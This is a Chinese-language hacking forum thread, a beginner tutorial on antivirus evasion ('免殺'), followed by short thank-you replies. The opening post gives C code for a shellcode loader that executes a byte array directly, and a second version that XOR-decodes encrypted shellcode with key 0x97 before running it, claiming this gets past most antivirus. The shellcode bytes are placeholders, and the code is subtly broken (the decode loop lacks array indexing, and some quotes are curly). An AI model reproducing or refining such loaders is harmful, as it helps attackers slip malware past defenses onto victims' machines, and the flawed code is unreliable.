資源共享吧|易語言論壇|逆向破解教程|輔助開發(fā)教程|網(wǎng)絡(luò)安全教程|rigasin.com|我的開發(fā)技術(shù)隨記

 找回密碼
 注冊成為正式會員
查看: 2225|回復(fù): 6
打印 上一主題 下一主題

[免殺] 零基礎(chǔ)入門學(xué)免殺(一)

[復(fù)制鏈接]

5

主題

8

帖子

0

精華

新手上路

Rank: 1

資源幣
15
積分
20
貢獻(xiàn)
0
在線時間
2 小時
注冊時間
2020-2-21
最后登錄
2020-5-3
跳轉(zhuǎn)到指定樓層
樓主
發(fā)表于 2020-2-21 20:25:02 | 只看該作者 |只看大圖 回帖獎勵 |倒序瀏覽 |閱讀模式
零基礎(chǔ)入門學(xué)免殺(一)

目前有很多利用shellcode自動免殺的工具,但是這些工具的指紋有相似的
如果有人傳到網(wǎng)上掃描被殺或者工具過時怎么辦?
這時你就需要自己制作免殺了
最簡單的就是shellcode加密直接生成可執(zhí)行文件

直接生成shellcode、
有時候shellcode是直接可以免殺的  但是有的時候是會被殺的



一:無加密直接自己生成可執(zhí)行文件
分配一些內(nèi)存,拷貝字符數(shù)組到分配的內(nèi)存中,最后執(zhí)行它


#include"stdafx.h"
/* length: 798 bytes*/
unsigned charshellcode[] = “\xfc\xe8\x89\x00\......”//這里寫shellcode

int main(intargc, char* argv[])
{
       ((void(*)(void))&shellcode)();
       return 0;
}



直接生成有時候能過一部分殺毒



二:加密shellcode生成可執(zhí)行文件

加密的方式有很多,可以加密一次也可以多次加密,我用異或加密演示給大家看

首先把自己的shellcode進(jìn)行異或加密一次,然后把加密的代碼解密執(zhí)行。

我這里把shellcode和0x97異或加密過后解密執(zhí)行

#include "stdafx.h"
#include <windows.h>
#define KEY 0x97     //進(jìn)行異或的字符
/* length: 798 bytes */
unsigned char buf[] =
"\x6b\x7f\x1e\x97\x97\”   這里輸入你自己加密過后的shellcode
int main(int argc, char* argv[])
{
  unsigned char c[sizeof(buf)];   //獲取shellcode長度
  for (int i = 0; i < sizeof(buf)-1; i++)
  {
    c = buf ^ KEY;//進(jìn)行解密
  }


  ( (void(*)(void))&c)(); 執(zhí)行shellcode
  return 0;
}





這個方法目前可以過掉大部分殺毒






















回復(fù)

使用道具 舉報

1

主題

10

帖子

0

精華

新手上路

Rank: 1

資源幣
4
積分
11
貢獻(xiàn)
0
在線時間
1 小時
注冊時間
2020-2-28
最后登錄
2020-5-7
沙發(fā)
發(fā)表于 2020-2-28 13:11:38 | 只看該作者
我看不錯噢 謝謝樓主!
回復(fù) 支持 反對

使用道具 舉報

9

主題

371

帖子

0

精華

終身高級VIP會員

Rank: 7Rank: 7Rank: 7

資源幣
216
積分
390
貢獻(xiàn)
0
在線時間
145 小時
注冊時間
2020-2-21
最后登錄
2024-6-15

終身VIP會員

板凳
發(fā)表于 2020-3-23 23:34:02 | 只看該作者
樓主雷鋒啊,謝謝分享
回復(fù) 支持 反對

使用道具 舉報

7

主題

212

帖子

0

精華

終身高級VIP會員

Rank: 7Rank: 7Rank: 7

資源幣
349
積分
670
貢獻(xiàn)
0
在線時間
98 小時
注冊時間
2016-9-27
最后登錄
2023-5-10

終身VIP會員

地板
發(fā)表于 2020-6-22 21:04:04 | 只看該作者
感謝分享,感覺很實用
回復(fù) 支持 反對

使用道具 舉報

0

主題

61

帖子

0

精華

注冊會員

Rank: 2

資源幣
19
積分
61
貢獻(xiàn)
0
在線時間
9 小時
注冊時間
2020-3-2
最后登錄
2020-7-13
5#
發(fā)表于 2020-7-11 09:38:35 | 只看該作者
樓主,我太崇拜你了!
回復(fù) 支持 反對

使用道具 舉報

3

主題

229

帖子

0

精華

終身高級VIP會員

Rank: 7Rank: 7Rank: 7

資源幣
41
積分
235
貢獻(xiàn)
0
在線時間
34 小時
注冊時間
2020-6-12
最后登錄
2022-11-7

終身VIP會員

6#
發(fā)表于 2020-7-29 14:28:54 | 只看該作者
回復(fù)

使用道具 舉報

2

主題

172

帖子

0

精華

資源共享吧豪華貴族SVIP

Rank: 9Rank: 9Rank: 9

資源幣
7
積分
174
貢獻(xiàn)
0
在線時間
18 小時
注冊時間
2022-9-21
最后登錄
2023-4-20

終身VIP會員

7#
發(fā)表于 2023-4-10 20:15:24 | 只看該作者
6
回復(fù)

使用道具 舉報

 點擊右側(cè)快捷回復(fù)  

本版積分規(guī)則

小黑屋|資源共享吧 ( 瓊ICP備2023000410號-1 )

GMT+8, 2024-10-23 03:18 , Processed in 0.065000 second(s), 14 queries , MemCached On.

Powered by Discuz! X3.4 Licensed

Copyright © 2001-2021, Tencent Cloud.

快速回復(fù) 返回頂部 返回列表